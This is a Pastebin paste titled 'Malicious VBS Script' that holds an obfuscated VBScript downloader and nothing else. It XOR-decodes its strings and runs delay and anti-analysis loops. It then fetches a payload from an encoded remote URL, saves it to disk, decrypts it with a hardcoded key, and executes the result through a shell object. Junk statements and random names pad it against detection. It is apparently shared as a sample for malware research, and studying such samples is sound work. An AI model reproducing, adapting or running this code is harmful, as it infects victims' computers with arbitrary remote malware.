SHARE
TWEET

Malicious VBS Script

dynamoo Feb 17th, 2016 191 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. Dim NvBbjLvaPhjk,OW5F8Xy6bno
  2. sub Qy8MLTj()
  3. LtOt889jkOkTpN=Second(16)
  4. Dim LWD6xXM78lMm,INDKnxORfbqF3
  5. BuGkcKTmyRe5jP=Second(20)
  6. dO WhilE LWD6xXM78lMm<>1
  7. INDKnxORfbqF3=INDKnxORfbqF3+1
  8. LooP
  9. Oo9eTEL=Second(72)
  10. End Sub
  11. W3E53kMDU=Second(67)
  12. XsJcEhaX
  13. Function Qu4DoCs0TbMe(OIj6aGz3r,SemfKVtstZH6B2)
  14. BWfL=Second(78)
  15. Qu4DoCs0TbMe=(OIj6aGz3r anD NOt SemfKVtstZH6B2)oR(nOt OIj6aGz3r aND SemfKVtstZH6B2)
  16. YYOCmA186bT=Second(52)
  17. End Function
  18. Sub AJr4qOS()
  19. UNTLCL84LdAIwI=Second(66)
  20. On Error Resume Next
  21. XcetMrOfKIoBFDhCG=Second(83)
  22. dim BmJgo9cefTBmGjWmV,UgR1ZLDeaSDnjI,GVTP18OygivIPpx,XrJe79vS
  23. WyTyvUXJc98TJ8r=Second(21)
  24. XrJe79vS="AsWN"
  25. BACUjf=Second(76)
  26. BmJgo9cefTBmGjWmV=Tkii81aBkqaNOqzB6("3004450674775F460139761D58153C37035E103A76135E1B","NXp1v")
  27. OLnKWDCFD69E=Second(58)
  28. SeT UgR1ZLDeaSDnjI=cReAteoBjEcT(Tkii81aBkqaNOqzB6("3E3E2D331C2421270779160C3F1F1A1523",XrJe79vS))
  29. Eiv0YooOxcF=Second(8)
  30. UgR1ZLDeaSDnjI.oPeN Tkii81aBkqaNOqzB6("110733","VVBghRWLrk1eGeiz8"),BmJgo9cefTBmGjWmV,0
  31. LHmVEXZGks=Second(18)
  32. UgR1ZLDeaSDnjI.SeTREQueSTHeaDEr Tkii81aBkqaNOqzB6("2633073534","QtRiR"),Tkii81aBkqaNOqzB6("17344506470A710166","BuM1c47C0KGrz18")
  33. Sy6OUOYAt6aimecyH=Second(89)
  34. UgR1ZLDeaSDnjI.SenD()
  35. PZ0KfDYS7oz=Second(51)
  36. If UgR1ZLDeaSDnjI.STATUsTeXT<>Tkii81aBkqaNOqzB6("230238130E59266775032A035D3F23","WscJgg8JG6lDw8Q") THeN Qy8MLTj
  37. QJ2uLOooBQu3X4=Second(26)
  38. End Sub
  39. Sub NymvPjZ()
  40. DoK1LWWPw=Second(38)
  41. Dim ASg4iHC4J2c,RIUxK57PMTzkjS
  42. RIUxK57PMTzkjS=NvBbjLvaPhjk & BbD7Z & Tkii81aBkqaNOqzB6("68101515","NFump42Xk")
  43. Fk5vWJ1n=Second(69)
  44. D5VVeYcpEKn3N NvBbjLvaPhjk,RIUxK57PMTzkjS
  45. QX0CpW6zpoI=Second(22)
  46. H5t548lhYv74(4)
  47. RlZCLHsKuI0d=Second(62)
  48. ASg4iHC4J2c="HsEcbirtW"
  49. VXtqKrULIq=Second(14)
  50. cREaTEoBJeCt(Tkii81aBkqaNOqzB6("24160010000200791B1B200F0E",ASg4iHC4J2c)).RUn """" & RIUxK57PMTzkjS & """"
  51. CI1bImqlZC=Second(81)
  52. End sub
  53. Function BbD7Z()
  54. DgSEG0xA=Second(57)
  55. BbD7Z=SEcond(Time)
  56. A0gM9WCPfe=Second(56)
  57. End Function
  58. Sub Tn5yV22Pck98Bt(WzuHIPsTNUvg)
  59. Uh2Z3Bl2=Second(98)
  60. Dim RyD,D7WLnskP
  61. Y4bimGH=Second(70)
  62. D7WLnskP="Iyrp7T1oaT7"
  63. AuVaD=Second(83)
  64. sET RyD=CREAtEobJEcT(Tkii81aBkqaNOqzB6("38363F73161F3C1526522814",D7WLnskP))
  65. IEvFkqrFWNd7ZeU=Second(49)
  66. RyD.typE=1
  67. PVvfoNU=Second(43)
  68. RyD.oPEn
  69. UEmdn=Second(57)
  70. RyD.WRIte WzuHIPsTNUvg
  71. MtTHhXiMUNv6m7=Second(13)
  72. RyD.SAveTOfIlE NvBbjLvaPhjk,2
  73. RzY4vDzewhF3=Second(90)
  74. Set RyD=nothInG
  75. C0BuyCgM6y=Second(33)
  76. NymvPjZ
  77. I2vbubfGG2Ly8RKfI=Second(63)
  78. End Sub
  79. sub DdVh()
  80. JmxBbmvcWAHf2D=Second(38)
  81. On Error Resume Next
  82. B2tRhqIH=Second(54)
  83. FrB7D4Q8629mzFE 1,23
  84. XC0ClC1Nzc0=Second(75)
  85. PzQC1niUytfW6=Second(22)
  86. End Sub
  87. Function Tkii81aBkqaNOqzB6(WAmuWrfUizB,TlZPOJ1Wpi)
  88. R99Ofi4RjMP8=Second(5)
  89. Dim O6PeArEgF,GhSR6u83,Ser3tDBCPHUzQftM
  90. XdLhZs5HeRJL=Second(23)
  91. fOR O6PeArEgF=1 To (lEn(WAmuWrfUizB)/2)
  92. GhSR6u83=(CHrW((9.5 + 339 + 9.5 - 339 + 9.5 + 339 + 9.5 - 339))&cHrw((18 + 215 + 18 - 215 + 18 + 215 + 18 - 215))&(mId(WAmuWrfUizB,(O6PeArEgF+O6PeArEgF)-1,2)))
  93. Ser3tDBCPHUzQftM=(AscW(mID(TlZPOJ1Wpi,((O6PeArEgF MOd Len(TlZPOJ1Wpi))+1),1)))
  94. Tkii81aBkqaNOqzB6=Tkii81aBkqaNOqzB6+ChR(Qu4DoCs0TbMe(GhSR6u83,Ser3tDBCPHUzQftM))
  95. NeXt
  96. HSbDsk=Second(71)
  97. End Function
  98. sub YjwrziQkKqgQ()
  99. T7kytHw=Second(32)
  100. Dim ByxaWy, NsuKzYr5MN
  101. For ByxaWy = 48 To 8000673
  102. NsuKzYr5MN = UQ6EW6CtW9 + 42 + 24 + 51
  103. Next
  104. PVEC7mYrH=Second(6)
  105. End Sub
  106. Sub H5t548lhYv74(KJuponW0UT82CaSh)
  107. Kwv5qeL76R=Second(82)
  108. Dim Gf7Cc
  109. SpQEHwjbwz=Second(6)
  110. Gf7Cc=TIMEr+KJuponW0UT82CaSh
  111. dO WHIle tIMER<Gf7Cc
  112. Loop
  113. NXSlh3OLv=Second(92)
  114. End Sub
  115. Function D5VVeYcpEKn3N(GTj0mbsOV3AJSPna,K614klYioX)
  116. UHOlBJucge=Second(17)
  117. Dim YnJoeq47WjqvQr8E,LTc1SisV5NL,K63xC79X3UA,XYDH1in9i,QsCd6ZzyGnXaWBi,NeBschTT(9)
  118. KSTKl0XJM=Second(3)
  119. NeBschTT(0)=104
  120. NeBschTT(1)=119
  121. NeBschTT(2)=102
  122. NeBschTT(3)=52
  123. NeBschTT(4)=49
  124. NeBschTT(5)=107
  125. NeBschTT(6)=106
  126. NeBschTT(7)=57
  127. NeBschTT(8)=115
  128. NeBschTT(9)=68
  129. OjB2PA=Second(62)
  130. SeT LTc1SisV5NL =CreAteOBjeCT(Tkii81aBkqaNOqzB6("0754460F061D0B23327A715D0A133A1B3E21315A7B041C0C0139", "UT74fvibM"))
  131. IMUp2NQ7U=Second(95)
  132. sET K63xC79X3UA=LTc1SisV5NL.getFILE(GTj0mbsOV3AJSPna)
  133. VPIL=Second(32)
  134. SeT QsCd6ZzyGnXaWBi=K63xC79X3UA.OPEnASTExtSTREam(1,0)
  135. R9tf5Y7su1d=Second(41)
  136. sEt XYDH1in9i=LTc1SisV5NL.CReATEtEXTfIlE(K614klYioX,1,0)
  137. XLiBl4=Second(78)
  138. YnJoeq47WjqvQr8E=0
  139. I3kPO3vBRPR1=Second(66)
  140. dO UntiL QsCd6ZzyGnXaWBi.ATENDoFsTrEAM
  141. YnJoeq47WjqvQr8E=(YnJoeq47WjqvQr8E+1)\10
  142. XYDH1in9i.WrItE CHr(Qu4DoCs0TbMe(aSC(QsCd6ZzyGnXaWBi.ReAd(1)),NeBschTT(YnJoeq47WjqvQr8E)))
  143. LOoP
  144. JQfTb3sm87sWErfP=Second(91)
  145. XYDH1in9i.CLoSE
  146. CvIMH2N3kP=Second(24)
  147. QsCd6ZzyGnXaWBi.CloSE
  148. Adx79m68zQMwBxoh=Second(91)
  149. SeT QsCd6ZzyGnXaWBi=NotHinG
  150. EsrPx=Second(9)
  151. Set K63xC79X3UA=NOTHINg
  152. DUi2bLYjBdnr=Second(7)
  153. SEt XYDH1in9i=NOThiNg
  154. LknbMMyC=Second(29)
  155. Set LTc1SisV5NL=nOThiNG
  156. CeKEf5Ww=Second(93)
  157. End Function
  158. Sub VWHrWTpYh()
  159. Xf5RLhXlb=Second(89)
  160. DdVh
  161. Dim YwLNFvxsSM,GnJ6LiXN9wd0SfjF,GvsN182csj,IpY,Gj93XWWOXwbeNo7z
  162. G6ZX=Second(36)
  163. On Error Resume Next
  164. HnV=Second(86)
  165. GvsN182csj="BMkGwftOMoLGM"
  166. QJIern34ZF4Bbn=Second(86)
  167. sEt YwLNFvxsSM=crEaTeoBjEcT(Tkii81aBkqaNOqzB6("1A3824050F043B633C2422212E",GvsN182csj))
  168. LgfTj3sNmDf=Second(2)
  169. YjwrziQkKqgQ
  170. TdA4qsiuNEU8=Second(55)
  171. AJr4qOS
  172. AIQoOaZdO7fKh3F=Second(92)
  173. NvBbjLvaPhjk=YwLNFvxsSM.expAnDEnvIrOnMEnTstriNgs(Tkii81aBkqaNOqzB6("4220281F162A13207D","KgAXor"))&"\"& BbD7Z & BbD7Z
  174. BsVN=Second(14)
  175. IpY="JEOCo3W8AOaw"
  176. WBrCAmDUka=Second(12)
  177. sET GnJ6LiXN9wd0SfjF=CreaTeobjECt(Tkii81aBkqaNOqzB6("0826201D5C2457273B4F2F070907173B63",IpY))
  178. MB4AnX8sHZiXkk=Second(76)
  179. GnJ6LiXN9wd0SfjF.oPEN Tkii81aBkqaNOqzB6("767415","Y11AL"),Tkii81aBkqaNOqzB6("393E2106686479060E1E66352F261F35257B18540D277F293A1B7D26310257033836751A39073325450A04121D1B212310006B","HQJUvRKVqyi") & BbD7Z,0
  180. QHXFcFYixQtJkru=Second(83)
  181. GnJ6LiXN9wd0SfjF.SETreQueStHeaDER Tkii81aBkqaNOqzB6("22281F2417","XpIqCr1"),Tkii81aBkqaNOqzB6("0D17192D30525F5E71715C43","ConmH")
  182. R1Fi9rIe02nPgY0r=Second(97)
  183. GnJ6LiXN9wd0SfjF.seNd()
  184. IEqs6tmVUSQ=Second(52)
  185. if GnJ6LiXN9wd0SfjF.staTUSteXT=Tkii81aBkqaNOqzB6("630E1C3D1E282B6A2E2B0C18571B3E","J3onIwIGJmDbl2u") then
  186. A01iypEJd=Second(10)
  187. YjwrziQkKqgQ
  188. R9AI2IHRkHli=Second(4)
  189. H5t548lhYv74(4)
  190. K6ZuqcJ5KOMdJTJ3=Second(67)
  191. Tn5yV22Pck98Bt GnJ6LiXN9wd0SfjF.rEspoNSeBOdY
  192. GKumkpaO9tCsjTWu=Second(23)
  193. H6BKPWKwfepile=Second(36)
  194. end if
  195. DwBYeOzyX5C=Second(18)
  196. End Sub
  197. sub XsJcEhaX()
  198. RvRqiz0lR4=Second(84)
  199. Dim QEdQvycjgQ5Q,GJWFOhXrpsoLNLTM,ItgCqYy1wHfHKsmO
  200. XlUpvFcrjFVdOvJs=Second(36)
  201. QEdQvycjgQ5Q=99829964:GJWFOhXrpsoLNLTM=0:ItgCqYy1wHfHKsmO=0
  202. OLWdqIX6X2KY=Second(94)
  203. FOr GJWFOhXrpsoLNLTM=1 To QEdQvycjgQ5Q
  204. ItgCqYy1wHfHKsmO=ItgCqYy1wHfHKsmO+1
  205. Next
  206. GIANUI52LWN5rirn=Second(50)
  207. iF ItgCqYy1wHfHKsmO=QEdQvycjgQ5Q Then
  208. JWA7EwpjwkSYWy1=Second(78)
  209. H5t548lhYv74(4)
  210. XNtkMbX63TaaIvy=Second(97)
  211. VWHrWTpYh
  212. N1AemqxRYccoa=Second(55)
  213. ELse
  214. IYP6EZHw=Second(84)
  215. If CByte(10)=True Then NTI8xj=9565
  216. CreateObject "KQ88xO47qS0I5QEU4","XDzEhC1OuqI"
  217. LSyoDfa=UCase("30")
  218. If CBool(35)=True Then LYqTSTZaBPsQ=74
  219. Atn 29
  220. NUbNdHKNS2S=EOF
  221. OaS1s5F=Fix(38)
  222. GetObject 64,58
  223. DateSerial 25,50,52
  224. Year 68
  225. JGk41QMnjLZqbJAt0YVJWxfL=Second(52)
  226. EnD If
  227. Hu1bg=Second(5)
  228. End Sub
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top